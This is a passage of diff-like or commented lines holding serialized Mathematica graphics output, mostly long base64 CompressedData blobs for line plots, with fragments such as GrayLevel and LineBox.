+%vn1/tzFGCeRZBUPumZ9W9UugeVTBjA+LDfRME8m3ClaHR5697p9I86mCbDuz +%Oyu7J5F3FaTd/V1+PiiJ5lUNE23umRX0SSb/ajhuONbmiPx7jGJ+1eCghIa+ +%g//QfqgG3xNPHgte/6F5VkP4l+3hBaNSaH9Uw9NUx3Fln1JovtXwsNqzfMfE +%VNov8ufvT2k6/EileVfD/KcvLh6ck0b7pxoM9Mr366ek0fyr4aeT3ZZWx3Ta +%T9VQHBI1aW5hOnnUgFr40sdKm/+SRw28nhxwR6nxL3nUwKrOX3FH3DPIowaK +%DI/lzdLMJI8aWBIWl3jgbCbtvxq4Mi8x6I4wizxqYNyJn2qX52SRRw3EHxUM +%iricRR7y4wVd0xz5N4s8aiBn9Phbf82zyaMGVKpGiB+szSaPGkh92f3Yg8fZ +%5FEDvMXqFcV12eRRC5xxO1rmjMohj1r4e33qT65nDnnUwtnYX5dqInLIoxbm +%LbpiqinOJY9aGKqnKVi8MJc8aqFQ8mtp4fVc8qgFu6v+V98V5JJHLaRr3Twe +%PSCPPGrB4m3IQY1deeRRCy3LNqqvD80jj1pQ43HaLDXzyUN+PXfjK6xn55NH +%HTgdWbLK7ko+edSBpvY9i4jcfPKog3737p850L+APOrgS5vw0rZdBeRRB/7O +%2c+DPheQRx0E1AgdtQSF5FEHPl39e6csKCSPOkj/o4Qp/oXkUQfz/Fc/E5UX +%kkcd3LbS+3DRuog86kB0eELEskNF5FEHPd1X9F0SW0QedRAvOvr9rXExedRD +%2LvqyCXrismjHjbN21jR81UxedTDt4DYpctUSsijHsww7VyYbQl51EPkWusd +%ftdLyKMeYkK6C26WlZBHPdiEZvatGVlKHvWwIXj7voPHSsmjHob0DN22608p +%edRD/rzaO18tysijHjr87p5evKuMPOoh/rvznOnhZeTRABt87ilt0isnjwb4 +%41I+qHZNOXk0gJnJjx0Rb8rJowEe1RzrVcStII8GaN88qmKRfQV5NED+144/ +%Ux9VkEcDTOAZzdzWWUEeDfC8JHWj6pxK8miA99WDs7MDK8mjAQ7ZbpCNaKok +%jwYI/FRlGNejijwaADr2rI2ZVUUeDXBqit7Quj1V5NEIz5qrtNYEVpFHI1zx +%+vAzPKaKPBrhq75j8IHmKvJohIvaSeUruleTRyNYmxuZuc6qJo9GKFvNmRDq +%Wk0ejTAxqb3PpDvV5NEI+guqVIrjqsmjEZRTalzT26vJoxHMqkdpN/euIY9G +%2P22Z8qwBTXk0QidX3LLP3nWkEcTcLtnmxx+UkMeTbDQ4eqU1ek15NEEM/c5 +%V5zm1pJHE3iPW8ipH1ZLHk1g+ZRvfnJlLXk0gavLI32Hc7Xk0QQ8aC3a8KmW +%Pj+bIKET1j+vqCWPJlCa9PLGCJM68miCQwYTZqpOryOPJtBqfSZrknem8GiC +%GXYux0bcryOPJkgZ3e/E55Q68mgG7V+/9m3g1pNHM9TxdtusH1FPHs0Q5587 +%JmhdPXk0w6TdoweNvlJPHs2w+/Sjbs1R9eTRDKbJzq86WuvJoxlcZLOU5/Rv +%II9mUNpbujhnaQN5NMPZiMaAkDMN5NEMWZMHL6j40kAezZAU8mPIKvk+Ung0 +%Q2FHjptJr0byaIGVPXtv7WnfSB4tMMVr5FuXU43k0QL9HhWNNZY7KzxaYETl +%S2N+QyN5tMDYqEvR0/o0kUcLvBo/7savpU3k0QIbe8R+DDvfRB4t0PfdzB6N +%EU3k0QI7Fm5o9OpoIo8WCLFYOF8/Q4oKjxaIfXJO716pFBUeLaD5JF40q1mK +%Co8WkG36XifUkKHCoxVarG0PpWvLUOHRChmaHZN/mstQ4dEKCw+Z7Pw5SIYK +%j1b45N1rS9EYGSo8WsFhsINJlxkyVHi0wpqVnGtb7WWo8GiFQ5udshPWyVDh +%0QptGxdtddgtQ4VHK1SEZ5nUHpahwqMVat2dBPcuylDh0QqOlrsa9gTKUOEh +%//vpD6rXPZehwqMN7IOXzHX9IkOFRxvYuukdvhYnQ4VHG2SmvHEpzJKhwqMN +%rH4ccJxYJUOFRxv0O9/o+aNThgqPNjgwrO7ZZpE2KjzaYGHiEu3hptqo8GiD +%8+laa7oO1EaFRxu8v1jxujtoo8KjDUz6en6ZOUubPNogfH/ieD9HbfJoAyja +%0SLdok0ebVAx8uqpJx7a5NEO626UqK09q00e7VBuUpc46ZY2ebTDD2fJ7kXP +%tcmjHQb7LjA4FqZNHu1wYULt4cJEbfJoh9l/zu7dXqhNHu2g17Ww26BmbfJo +%h2U3eF15fB3yaAdlw/fnzU10yEP+3MZnxcqBOuTRDk3LqnwSx+qQRzvMeZw4 +%fc88HfLogEQ3t6Xz1uiQRwcsueMhXemqQx4dMNxNsvjxSR3y6ICSEaeDevvr +%kEcHWOxy6Z33Qoc8OqBVvfJBSoQOeXTA/uH3tsn+6pBHB+ztlr/0WLUOeXRA +%26WGmxPUdcmjA5Tm9soZY6RLHh3gZDq2+PAgXfLogFmrHs/Qm6hLHh1gddNA +%udFelzw64YptnorJVl3y6IQ+1UOWXTuqSx6dsPH4VgOXG7rk0QkhLuU9/F7p +%kkcnpFefi+kVo0senaAzwfqdYYEueXSC2q4wvmOHLnl0wpi/Wp56enrk0Qmn +%BY5lYwbpkYf8+ZGlvIQpeuTRCcsObXuXukKPPDpBd9vgCkc3PfLg4L4bhfdd +%fPVoPRz8kHxCvf2FHvlwMPY294xxnB6tj4NuEw8e+16uR14cNEy2tdTh69N6 +%Odir4Ty3vZc++XEw7WTKxzuT9Gn9HDR+YN2larU+eXIwtCxGWH1Yn+bBwQil +%P88ig/RR8XuGg9OcvVLXRurTfDiof23AqOJSffLmYPLNgPEzRQY0Lw4K04Xd +%Aq0MUPH9gYOcZuONnYsMaH4cDBKHa69wN6D9wMFxyz28iu8Y0Dw5uGLtg+sn +%fhnQ/uDgn54R8TubDWi+HDzQ2NF6s7sh7RcOWnIe2JrONqR5c1DdL+Zoi5sh +%7R8Obgy4u6zbY0OaPwffzEk79iPDkPYTB20M1B8ki43IQwknfM4Zaz3eiDyU +%8HAT72L8biPyUEL19xdFux8bkYcSbsxtHPktz4g8lLDzmajFxMiYPJQwymRD +%6WtbY/JQwqS5QeXcQ8bkoYRio/jMzmfG5KGED8x9z0xKNSYPJZzqeMSgvs6Y +%elPCaxNmDBe2GZOHEo7fYdTVqMCYPJTQPnZyq/NdY/JQwkpf9Z+bRxqTh/z9 +%vMC0l1eMyEMJhzyueFUXb0geSsiPFJ01b2YeSmh0vXfJTWPmoYQyk6FqxtP1 +%yUMJ7XY9Vg47qUceSng0+kLj8Fxd8lDC0dkvSmymsZ7lr7tVeZwMY/cnJWyo +%35//aLoOeShh1/aYyxOztclDGTt8Bl1K+//7rzKqOz/MaeqtTR7K2Ffz0Zf6 +%VPb5qIy/3+/9r/Ac+3xRxm6hya2/bdnnpTKGe7wWWGizzxtltKn3GV6eJiUP +%ZdQN6xfWFiQlD2V0KDJKu7RLSh7KOMki3mX6VCl5KOOOlgwDblcpeSjj9skD +%T65pkpCHMp5eobPVNF5CHsp4Yu2CublPJOQhX1+QqdGDUxLyUMZXt4/b9N0s +%IQ9l1MozzbKdLSEPZSzh+quVDpGQhzLe7TjSu8hAQh7y+Ri+knTjSMhDvl7t +%tEzfQjF5KKOSUso6vVgxeShjd+eFPrffislDGfd/abUyDhSThzL2i6vftOW0 +%mDxUcIy7hZ/PXjF5qGBj4rTxXmvF5KGCz6fbv7VcICYPFZxpO7DywHgxeahg +%c8VNHXcrMXmo4M//bjiKuonJQwVbu8WsHCkTk4cKtvCvDstWEZOHChbVP1Dq +%XSIiDxW0sbkzY9dPEXmooJnOw1sfgkXkoYJ8lWnd4i+JyEMF7bc0xETuE5GH +%Cm6/8PTjiRUi8lDB9NERyWrTROShgufn3JwxzEpEHipo+XLsXB1jEXmo4M0Y +%8UM/NRF5qOCms35XvlVqkYcKBjtZHz2YqkUeKqjT8Wzat29a5KGCNeu7jrwd +%rEUeKmg4++bkTj8t8lDBBKt7L7K8tchDBeFQ7dzRu7XIQxWnDgmMEa/WIg9V +%jPT2rbadp0UeqvjNs2O/yjgt8lDFDM/T3C6DtchDFc8Ihx/yMdMiD1XUv3Gj +%p6tEizxU0a7s/In3SlrkoYondYLHz6oRkocq2jxetnxsrpA8VNGZa831ShCS +%h/x1/dm3TL8LyUMVh/f7O0PtjZA8VNEqqN9ly/tC8lDFiVHCF8+uCclDFR3a +%ElN3nhaShyre6Ts02sNTSB6qaB2f6xmzQ0geqhhq+Mhr8ToheaiiZnjnDosl +%QvJQxcMfDacMnC0kD1W8cWe01dYJQvJQxc04e2PFCCF5yOc5v9zjzgAheaji +%f86LOk53E5KHKo4Xhbk80xeShxq+//7KkaclJA813DvtcffjKkLyUMPO1LGb +%xzQLyEMNh8ycsbd7pYA81FBzafC4ofkC8lDDZTqLTm9NE5CHGpZ83dUtM05A +%Hmo4OfI+uEQIyEMNt3vUDx0UKiAPNfRatq639JWAPNRw4+s6E9NHAvJQw1yl +%J5NnBwrIQw1/Lr3RHnhVQB5quDXe84b5eQF5qOH333bdQrwF5KGGK/8ILT08 +%BeShhhseZoU4ugrIQw1jq9+kLdsqIA81NNo91v3QegF5qOGLVhXJ9+UC8pDP +%79jYwB72AvJQw69P6sJuzRWQhxo+5R+fNma6gDzUcMfb/a4N4wXkoYZ/Ays6 +%I0cLyEMdDVTjo94ME5CHOoYtGZjyaaCAPNSxxwZeeVYv5qGOylayRV3MmYc6 +%Kk3bULDNiHmo49PDe3pkaTMPdczUNLBbo8U81LFzrOC8iibzUMcgt4jVL5WY +%hzqeqNRxcW/lk4c6JmXMVXes55OHOu6rThsxr5JPHur4M2BM45JiPnmo4xKx +%uoVrLp881DEw6q7347988lDHN00bDjQm88lDHR1XPmmx/c0nD3UM2TGr5f0P +%Pnmo41uLfPPR4XzyUMf3XScm/vjMJw91HL0xw3jzBz55qOOaWbUt3V/zyUMd +%v0wzby8P5pOHOvZ0con48pBPHvJ5Tc4/8zCITx4aOL0gyuz2LT55aKBHbdzG +%h3588tBAFeWOO999+OShgYPuDl1Xdp5PHhq4T999TI/TfPLQwAdrLSY7e/PJ +%QwMbi5ZqhnjxyUMDV6dzLc0P8MlDAys7V/c6u49PHhqobpPqJN7NPDSwn8Y5 +%U79tzEMDNV+knB+6mXloYEfTy81/1zMPDYztkht/ZjXz0MDD4Sufzl7OPDRQ +%X9u0xWQp89DANYMMZzcuZh4amOxU/Tp9PvPQwL4R9f4/ZzMPDez9dtLh6BnM +%QwOPTg6I+z2FeWigmv3EcQUTmIcGcvu7RKjaMA8NLDFvshw4hnlo4NZjQZdW +%jmQemphpvsY7YBjz0MQV6v0elg9mHppoNeveoLEDmYcmzk0/GHijL/PQxEXh +%uhyNXsxDfrzpAR57ujMPTUzqca9fXVfmoYmhb2o/7DZhHppoPO+JqaYh89DE +%6w45//nrMg9NvBf6MBNkzEMTF98Z3a9UxDw08THf8JafgHloom5tSuICLp9+ +%f8rPd6StzEideWhi3TqxZrEy89BED8f5Az508shDEwNd327wbeORhybqhF2f +%tq+ZRx7y9RmE9Hdu4JGHJg7Jq3uyrJZHHpo4zcZCd0kVjzw0ce/X+Sucynnk +%IZ+v8fwZziU88tDESouOcrdCHnlw0aBvbqRvHo88uHi83XTju2weeXBxwfTq +%1twMHnlwcbLm9q/SdB55cDHt5rlBU1N45MFFvp2T9+EkHnlw8dQmA6/oeB55 +%cDH8nN4unTgeeXAx0/Ne56oYHnlw8cql5SEfo3nkwcVjmya3GkfyyIOLXX0m +%9T3wnUceXGzWbU8s/cojDy6WdB8w3+Ezjzy4+GDw+te/P/LIg4vWx9OCZ33g +%kQcX3wgmmce/ZR5c1N8cKXR4zTy4GCBy8C5+wTy4uK1gw4V9z5gHF98GCLrq +%PWUeXOzhHVf48hHz4OKQ08eP2D1gHlzc3vKsWfUe8+Bi28bAvy/uMA8epsVX +%aq8NZB487Mrv9sbsFvPg4f2tKh8zbzAPHkbFb7UN9GMePMzQnvZjw1XmwUO9 +%BVuPjfJlHjx0nucUL7zMPHj4ouBeVP4F5sFD4cQTsz+dYx48PLX4euutM8yD +%hzu52hVHTjEP+XUc0lbfdoJ58NDnQr27kzfz4GGu/lWzeUeZBw9DHk57PP0w +%8+BhdPnpBZMPMQ8eFo7JmjDFk3nwcNecFS0zPJgHD7+nxzfNd2Me8jnv1lJe +%vo958HDgJf3D21yZBw9t1+isOrabefBQypEW+O9kHjycXTN04aftzIOHomsj +%qrK2Mg8+ui0xDldzYR7y+9Cd8V0HbmYefAy4UHnJfiPzkN8nNrhPOuHMPOT3 +%sbbi+Z/WMQ8+frC/kdO0hnnw8b86s19Wq5mH/L543/zPtpXMg4/L591seLmc +%efAx92fuxbZlzIOPYpHD3YmOzIOPEVM6Us4vYR58FF1WM8y3Zx58XNX+NNPa +%jnnw8XifAMGZRcyDjxMnqF8pWcA8+HhS2WP2lPnMQ35fvJJ69f5c5sHH4RyL +%3lpzmAcf0xd9qdlhyzz4eFWUbJY9k3nwceDjZp+ZM5gHH826aPf+NI158NGg +%aM9Iq6nMQ/658tYp+v5k5iFAs0dzw7tNYh4C1Lh3a5P/BOYhQLcOpzVm45mH +%ALd0fNALsGEeApxun7Cl91jmIcC7pTJRMDAPATrH2W3+bwzzEGBS6C7zqP+Y +%hwA3+ElLFo9iHgL8o5TBqRjBPOTfe0uyfQ9ZMw8BxvYP5pkMZx4C7GNjFfZ6 +%KPMQoP9Tw/L5Q5iH/Hvfw8fRDYOZhwBfF6X4+FoyDwEO2NeUPGYQ8xDgs9zZ +%WDCAeQhwtNeGfWf7Mw8BRs8O7j6mH/MQoM+kdQ3lfZiHAPe47hx4ozfzEKD9 +%1GPFc3sxD/n36h7h/XgWzEOAPz73bP3cg3kIMSanydWtO/MQ4sUTGVUjuzEP +%IX7RXb6t1Yx5CLFS1yL3Q1fmIUT3wDfOB0yZh/x30/4818ldmIcQh5760CYy +%YR5CPPSpMyPNiHkI0XLryJV3DZmHEBOnJq3bZcA8hPj2L+f1ZH3mIcSI+Dgv +%Iz3mIcQFrqHSah3mIUTrETFvw7WZhxB7Buzz8JcxDyHOzR9lsF/KPITYlqGe +%YCdhHkKc/t3+ywgx85DPozM92FDEPIR4xpQf2S5kHvLX7wXeyhEwDyEunryU +%E8VnHkI8V9hd/TmPeQgxuM/PD35c5iH/3edxcI23JvPQwhGnFlvs0WAe8t/5 +%9SZX1qkzDy2M9HB+YqfGPOS/s9+VBc1UZR5aaF615MJ4Feahhd57M9tHKTMP +%Law+btIyRIl5aKGL2oIRgzjMQwvPLVxr2a+TSx5aqFbb9rpPB5c8tDCxxapv +%33YueWhh6YjlZv3auOShhYVHuv4a2MolDy3c7jkwf0gLlzy08EzQMruRzVzy +%0EK35W6fbJq45KGFuW0DNKc3cslDC78Vx6QtbOCShxYKVk1atFL+uavw0MJ3 +%JywOba3jkocWFl+J6eJZyyUP+Xq9hxy8UMMlDy0cr+kfcqeaSx5a+OitrOhd +%FZc8tLDPz+9r4iq55CFC3cSka0UVXPIQYR/D1c5K8ucKDxHOv6xhZ1TOJQ8R +%ThumNmF4GZc8RPh+bMvcefLvDQoPEc749DhnawmXPESo4pq8/1wxlzxE2COm +%0fFFEZc8RLindO/VpELmIcIt3OdzWwuYhwgLB9w50bWAeYjQr8T29cR85iG/ +%3guD52zOYx4i/Har+bNPLvMQ4X2Tl9Zfc5iHCO0GaAytzGYeIqySFv0yzmYe +%Imzt+Nx3Wpb8e9M/DxF6fGtw35vJPER40v7gvocZzEOEO9y2xGX8ZR4ilIQc +%PSL9yzxEuOqS7bpJ6cxDhJrfbdfuT2MeIowcYnTlRSrzEOPie38sylNoPWpi +%HDql++yeKcxHjJMD9qx3+sNV/L4SiTFj9PrVfsnMS4zCLocbUpNovQZiHJQb +%9Uk/ifmJsf/GH6sXJdL6u4lxn3FXb58E5ilG28lvrFPjaR4DxGjS093TJJ75 +%yq/vcOVJp9+0X63FCHc44XfimLcYI3vN61keS/OyEaPHU9fbVrHMX4x/0qe4 +%7/tF85suRpedvZ98i2H7QYwOa5MniWNongvFeHez5lr7n2x/iFG6qSwj6AfN +%10mMu33E3vXRXPr/M2LcmfLOcXw0zdtZjKFFtyaej2L7R4xTQxKm5kXS/HeI +%Uav+cvbQSLafxDjs774DRyPIw0OMF6dKPNPD2f4So9L7oNGDwsnDW4xL736x +%PvydPE6LUfy08EP6N/K4IMa9nQNdhnxj+0+Mzlofu58II4/rYoz1v7Qr/yvb +%j2Lsod3zGH4lj7tiNL/qtfXqF7Y/xVgbURTR+Jk8notxTop9+bzP7P4hn2fR +%nsPPPpFHiBi9v8ycLfnE9q8Yx7ROt3YJJY9wMdpMKNz7+yPbz2J8bRmYN/gj +%ecSJ8Zn3tbGXQtj+FqOeS6R58wfySJfP67j7tSUf2H4Xo07WyxVf3pNHgRjD +%v3Gn9XrP9r8Y59343n7qHXlUiTH54CnlhresBzHyup8/svQtebSIceIky6jw +%N6wPCfImunEGv2F9SHB5w+kF116zPiT4yajIU/M160OCI3RTi7a/Yn1I8P6B +%rvNyXrI+JHhmXvDbWS9ZHxLcmnd7QOgL1ocEN2+z2j/gBetDgpUOlrIbz1kf +%EhRJTs8TP2d9SHD6l/SOA89YHxLM1vXIqwtmfUjQRFY+Ym0w60OCQ66V6aY/ +%ZX3Ir0fXPmX2U9aHBK8Orov+/oT1IcGVfNmm0U9YHxJU7Xzj+OIx60OC5Q+l +%yX0fsz4k6DRo95/AR+x+KsFeTU+bTR6xPiRombYs+vJD1ocEfU+UBkgfsj4k +%aBqy/NnJB6wPCe538+XzHrA+JDiH093/8H3Wh/z6ZitPUr3P+pA/r3dw8rzH +%+pBghVvIcqV7rA8Jrg3r2ONxl/UhwdATlQ2cu6wPCRZPNz1+IIj1IcHMEVwP +%5SDWhwTx5gMrrzusDwmm3+NlaNxhfUiwR9rXTO/brA8J7ozO6SW6zfqQ4MJ+ +%M36dD2R9SHCFZuZ4g0DWhwSl16q8bgSwPiTodUWrqEcA60OC9kX3vz68xfqQ +%yH9PRlUNucX6kOAMfdd+If6sDwk6SAP6TfQnjwIJTvjoZhZ7k/UhwbFGz/Xt +%brI+JBhXku6fd4P1Id9PE/c1b77B+pBgxrQ67bbrrA8pug2fa3f0OutDik/s +%dq7Quc76kOLMhcEzA/xYH1I8YCrbaenH+pCiclBYbug11ocUc0x9fs26xvqQ +%4rqI/g8yr7I+pNhRa6W+5SrrQ37+RWeclK6yPqTo02XbwPNXWB9SvGp+jtvj +%CutDig8Ww7nXvqwPKR4/kxs71Zf1IcXYniYLM3xYH1IcvXhb3VYf1of89cu9 +%MjR8WB9SBM/lln6XWR9StN07c7bVZdaHFIc2+a2JvMT6kGJJxeHJyy6xPqS4 +%I8o2o/Ei60OKl/PcY09fZH1IsV4y06zXRdaH/HifNJs/XWB9SDFyx9M3dhdY +%H/J5j7C2rTvP+pDiO9kjvdPnWR9SXPGr5mDv86wPKf52F+K3c6wPKQq2meg6 +%nWN9SHHMqoCX7WdZH1LMU3Oec+Us60OKTpsLXYafZX1IcXF08qLEM6wPKe50 +%SF+77QzrQ4oG5zdNlp5hfcjnYf94TvBp1ocU9z27mmZ7mvUhxe4xfl2rT7E+ +%pNimOePz2VOsD7m/Wr+8wadYH3JfTumwhJOsDykeGzR0z86TrA8pJrmHb9I/ +%yfqQ4vh5zRbvT7A+pFho88pu6QnWhxS//ne9WukE60OKfbgD228fZ31IMfPS +%lZCpx1kfUvQYc+ZXpTfrQ4YXu3wruODN+pDhbmn/8yO9WR8y/HZhQlvWMdaH +%DMdm7j5/5BjrQ4ZvRjvYDTjG+pDhzqcLkhOPsj5kqPLMInX/UdaHDCP9Hkzs +%eZT1IcOS1idhMUdYHzJU35aXt+sI60OGsn6qaHaE9SHDISk7rKIPsz5k2K1o +%ydYdh1kfMpxnOrzG9DDrQ4ZDBeP+RHmxPmRoXmG/facX60O+fjX1ueZerA8Z +%+k7Xt4s5xPqQYbD5r7+uh1gfMrwQvJHb6xDrQ4b97cVWiQdZHzIcPmvBE8+D +%rA8Z3r/829jyIOtDhjru+ksyPVkfMsxcN8zllCfrQz7Pvu8jRnuyPmR4t8fg +%JeUHWB/yeW1sWuB3gPUhw6kfg/rNOMD6kKGueVpnuwfrQ4bTnxkrPfFgfchw +%WlwNd5kH60OG1qXyu4wH60OGASPqm766sz5kuMP53eqd7qwPGbo+K2ro5c76 +%kGGb106zdDfWh3z+41f7nHZjfchQeewUu3FurA8Zbnru4dq4n/Uhwz/n3oc9 +%2M/6kOHxVe+PLNvP+pCh1bCJ3jr7WR8yTHjbMjl6H+tDhhmZCYke+1gfMvy1 +%wSV/2D7Wh3y/nMsYV76X9SHDo9OOBwfsZX3I3/986F27vawP+d/r6CyU7mV9 +%aGNE04ukSFcu/h+i+QLA +% "]]}, +% {GrayLevel[0], LineBox[CompressedData[" +%1:eJw113lczNsbB/BpmmavZokkW7cI19ZybZfOI5VoVymKJCJbiVC3ouxLJJWI +%uOLey00JP1uYuAiFlLQo2hftm/b6DXOe7z+9pu/M+Z7n8z5zzjM6a3yXrmMy +%GIxOJQbjx1+8Ul26/o4JaJf9oZG8qCxoP7EvejblzHx8HU3Kp3Tv3KfSLrs/ +%5kC9w/0EYvLPcO7Gt230/hUSCL43zWPaZOfO/riukUvnfW4OX9lG359MLp2e +%4fRVr03W4PDjP6nkOLep5s+GVvr5O8R/ZtyTlXdaZfz8RL/5/HvkN9fQC5rB +%rXS8B0R9W1JLxsJW2ST3k886Jz4i3df91u0UtNLxn5CuwPe3dXNbZFfkn85P +%TCdX6xcp551roc97SsaeXSA7sKZFZvTz+o+cu2fBNpjcQp//nGw94u32sqJZ +%9l/nRPkTXpBj6y1fGm5vpvPJIAe1JiYnMZtlS38+8BVJ3xWvPzOqic7vNXmX +%EvnwjU6TrCzox4BviOGo0dt9UhvpfLPIRH1zkfaCRtm2H9Pze0vYlebXKrIb +%6PzfkfS0E4bpqxtkCo1sovf0TMejlnpaTzYxStlZk763Xmb58wEfiEWWzrh2 +%UT2t7wMZ+76vYOaf32Q/nuZ+Moes+8e++ILBN1pvLulmDSpNe1Yn+1lOfi7J +%2q+kW7C0jtb/kahbvitKrqiVjf0xnTF55G7pwekXd9TSPPLIxOEub9JUamXr +%vX9cn8iI7SY3hWdqaD75ZJnBKub+iTWyH6NpJOeTzZuAO/FhNc2rgESvbe6u +%saqWff8xXGcBufAx51FuSRXNr5DYvXROH+ZXJTP5OWARmRzfp7qDWUXzLCLW +%He4uddGVsp/TO/CZBCzmBH3Sr6T5FpOh/7UEZD2skL3N+nEVE6dLHZ6DNhU0 +%7xIyI377/ZCyctmwnxP8QtiJLrGTAspp/l/I4/P321R45bKfw7l/JfY7Pe5r +%XyijHqVkzICdT4JBGa2nlFyws3TUfllKfUpJsdLhEqZbKa2vlPS/D9zlWPqV +%epURrdyQ2z6Cr7TeMtKt22sTP/ML9Ssjq13q/FevKaH1l5M7ET3VshPF1LOc +%kDuSwZK0zzSPcjLX0C00qK6I+lYQ3U3SeDfNIppPBdGPdB78xaKQeleQw8KO +%x3sCCmhelWTqNqdxm6/mU/9K4mhePz4z7xPNr5K4f+v9PMj+RNdDFel6wdRM +%nJ1H86wi1zh3H52OZoNifVSR624L1xgks0GRbzXZ8i79iyyDDYr1Uk36NijX +%TStjgyLvamL6yND/VC8bFOunhlxcJ/izUMoBRf41JInt/og3lQOK9VRDLryI +%mDDVggMKj1rSvuLwQkMPDig8asn1lPDrWrs5oPCoJbuW/6vaFskBhUct0Q4X +%cFKvcUDhUUfMohOuOT3jgMKjjqiP6tSsLeKAwqOOpAdUqy1r54DC4xvRyOmX +%3RZwIfKnxzfya5ZdbKcuFxQe38jbm0kfpfO4oPCoJ5n9jp1jnbig8Kgn+5M4 +%9fzNXFB41JNAPe7Bin1cUHg0kKIzyeHR8VxQeDSQB8Xx18ff5oLCo4Esn9v6 +%9NIbLig8GoljSnrGYBkXFB6NJOiwh/eMHi71aCRXhwseWol41KOJbMn0Zi3S +%51GPJpImWOM8zIRHPZqIzW1OZoYTj3o0k4TR0+4s38SjHs3kaKnV8PQwHvVo +%JiwDHw+lOB71aCFWMIM1NplH62khUS9reRrPedSnhVgbGJ//XMij9bUQVePI +%wh3NPOrVQiKs1OrqWHxabwt54B+UPmUkn/q1kFcjWx1Np/Np/a3EyPjRhwlm +%fOrZSlK5r5vyXfk0j1bCuFbW5rCFT31bSalhsvf5MD7Np5W0rPhNIymGT71b +%SXH1dM2Qa3yaVxvxbw3J037Mp/5thPVCemR3Np/m10ZeXnTNiKngg+L72Ubu +%elZxt37n0zzbSO7iPZUqPAFdH21EZ6bqTXttAc23nZjbs7udpgroemknc097 +%zFcnApp3O3kxm1+xw15A1087+T1jUVCkp4Dm305m/hK/aqm/gK6ndhJ0+qHa +%w3AB9eggy2sdZ72NElCPDtJQlKsTdllAPToIz1qq/y5VQD06CPu37G1P0gXU +%o4McKw2fZ/FeQD06SEZtZLRXiYB6dJCjG7duEdULqEcnCf3rz9k23QLq0UkK +%HErbR6gIqUcn+Tt+dukmsZB6dJKsC8b3zEYLqUcn6XltrHt5opB6dJI6rvX6 +%UCMh9fhOVmUM+uTNF1KP7yQyqOvBP4uE1OM7ebvdM6zNXkg9vhPd3P2bUpcL +%qcd38m6q/5QyTyH1+E469l2Yvd9HSD26SB37zalYPyH16CLrJ++ql+4SUo8u +%EqezIHgwWEg9ukiQC+uEY7iQenSRoqilT6SHhNSji+zZ4Fv7+zEh9egmH9Sm +%2r0/IaQe3US3503em1NC6tFNJp2McjOIFlKPbjLayrKOGSukHt3k5DdG3IIz +%QurRTbQttkqb5K8VHt0E3L5bCeKE1KOH7LnrnHNOfl/h0UP+47jMuxSLHj1E +%dbxgkXYMevSQvcabWBqn0aOHzDDfueB4JHr0kD7fuqDDEejRS3Z1nq/jH0WP +%XmJw+Z3WiIPo0UtsjmnF3AsT0v2yl7wemPBLQzB69JJTUu20tF3o0UsKTQaL +%J/mjRx/JC1N78Ptm9Ogjz6Z5CLrXoUcfMbw4RcvLAz36yGpXJdtwV/ToI9yC +%m87uDujRR9JWbwvrWIwe/eTS+3y2gyl69JMvo6bl75yLHv3Ex+PTk42G6NFP +%vubv/NNwMnr0E795re45OujRT9gr8sfba6FHPzENeTGYJEKPAfIhKHKoiYMe +%A2TNeda/2kMC6jFAjpjxcmZ+F1CPATL54f63CxoF1GOA/JUOdxdUCqjHAPFe +%/+z4/M8C6jFIApqjOUY5AuoxSMIuGSye8FpAPQZJV9XacaPk32+FxyDpfMxa +%NeyegHoMkqf3v/2nkYz71SCJPrabMe4q7ldDJDUmjGt4HverIeIoOKu+7DTu +%V0Pk1OQRJYeO4n41RPr3Maa+DsP9aojcC7YyHBWI+9UQmfXilvp+P9yvGDBB +%i1U7uB7rYUD7pkTdUx64fzHAMMi9ZI4L1seASZ4uen22uJ8x4KXppLAPFgL4 +%Wa43A/ROTD3z0gT3NwbUloqO58wU0P2BAQEaVqo903C/Y0BC2JK7s/QxDwbY +%JwiXxY7F/U8+fuHBa6ojMB8G9J4rq7oswv2QATc812gv5WFeSlAyh9czion7 +%oxLMspycxOrj0/yUABqjVTkdeH4pQaL5yJLxjXyapxI0vp/DW12N55kSJI3R +%s7n7lU/zVYIp1e6dEwvxfFMCW/u7pXdy+DRvJQh+ZfjOPQvPOyXYslY8oPOS +%T/NXgm0HC58y0vH8U4KeUCLpesCnHky4t/d4GP8OnodMmLUuzW9mMp96MCGx +%57ZO8D94PjLBOfn60+LLfOrBhJXR622WXsDzkgm/ivcwq8/wqQcTtG1SNkdE +%4fnJhNa7anE2EXzqwYSooazB8YfxPGXCwemZK4ftw/6ACQsjR87QCuVTDyY8 +%VdeuNw7EfoEJSapm1T47+NRDGeIfx7Ym+2L/oAy/eV2yUd2EHspwYkdeQag3 +%eiiDkW6OWGUNeihDjdGXlxdXoocyjH2X3WazHD2U4Y1txr9qzuihDJ8fP3lW +%YY8eyuA/+GHtG2v0UAb192eVn1uihzIE2M43yjZDD2X41M1PagD0YIF63PhC +%7fnowYJXGr7PV8xBDxa8WP5r/7+/oQcL7G61HxUaogcLtoYdbv9jGnqwYPtS +%k4yByejBgojzR8Mi9NGDBcPZA+ZT9NCDBQZeB1IKx6EHCz5/U74YOxo9WLCs +%rt3McyR6sKDu2j3vOZrowYKKPz6+HquBHirQo9PDlIrRQwUCnM9HaaihhwoE +%dwY80BGghwq8rPaYO4+LHiqwt1LNxksFPVQg+6lgZCwTPVRgR88vbz8O8aiH +%ChBPVcexA9i/qkBJlaZbQC+PesjvP9FOyuviUQ8V2FXtc9q0k0c9VODwHKWZ +%D9qw32XDgb73z+e2YH/NBqXogIEXjdj/sqE0EhLc63nUgw2XN6Sf7K/FfpgN +%1rKBwqvV2I+zIS2WMcG1Evtj+Xhz42KGl/OoBxt87w0zK/6K/TIbTB24XddL +%sH9nQ9jhb9Xhn3nUgw3m1o4Fa+T9tsKDDR990q4syedRDzZ0ufZdn5eH/T4H +%1mjV+M3M5VEPDri0n1SZ/YFHPTjwNeBxKrznUQ8OJIZYDjq8xd8HHAi0LXyz +%MZNHPTiw+9n220df86gHB1zvORWnZqAHByygmXx9gR4cyDArDBz2HD04kKSf +%luvwDD04cPNzqUtMOnrI75cHZ355gh5cuKW82Xv6Y/Tgwh33tcUH0tCDC5wl +%3ZnlD9CDC8Yfnn02v48eXJCcDhtMvoseXHC9IRga/T/04ELyQG9M1G0ePT+5 +%ULv5oonqLfTgQlTK/7wjbqIHF/bYjd8iTUEPLixq+scj4QZ6cCEwM9FrWhJ6 +%yOfj98Du+XX04EHXaaWkVdfQgwftgWNeD/6NHjzY57t7deJf6MGDzQWMYuur +%6MEDr4sZ4r5E9OCBVbzm8OTL6MGDML249+v+RA8ehLfpOOlcQg8eHKpLaitL 